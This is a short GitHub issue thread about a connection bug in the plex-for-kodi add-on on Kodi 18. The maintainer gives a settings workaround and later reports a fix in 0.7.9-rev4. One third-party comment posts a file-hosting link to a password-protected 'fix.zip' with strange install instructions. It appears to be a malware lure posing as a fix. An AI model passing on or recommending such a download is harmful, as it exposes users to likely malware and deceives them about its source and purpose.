### ISSUE TITLE
[INFO] No connection on Kodi 18 (0.7.9-rev2) 

### ISSUE THREAD

**Issue by pannal** [pannal/plex-for-kodi#139]
There's a bug in 0.7.9-rev2. If you're using Kodi 18 and you can't connect to anything, please go to PM4Ks AddonSettings (long press the icon), system, then change the CA certificate bundle setting to `System`.

This will be fixed in the future.

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pannal** [comment]
Solved in 0.7.9-rev4
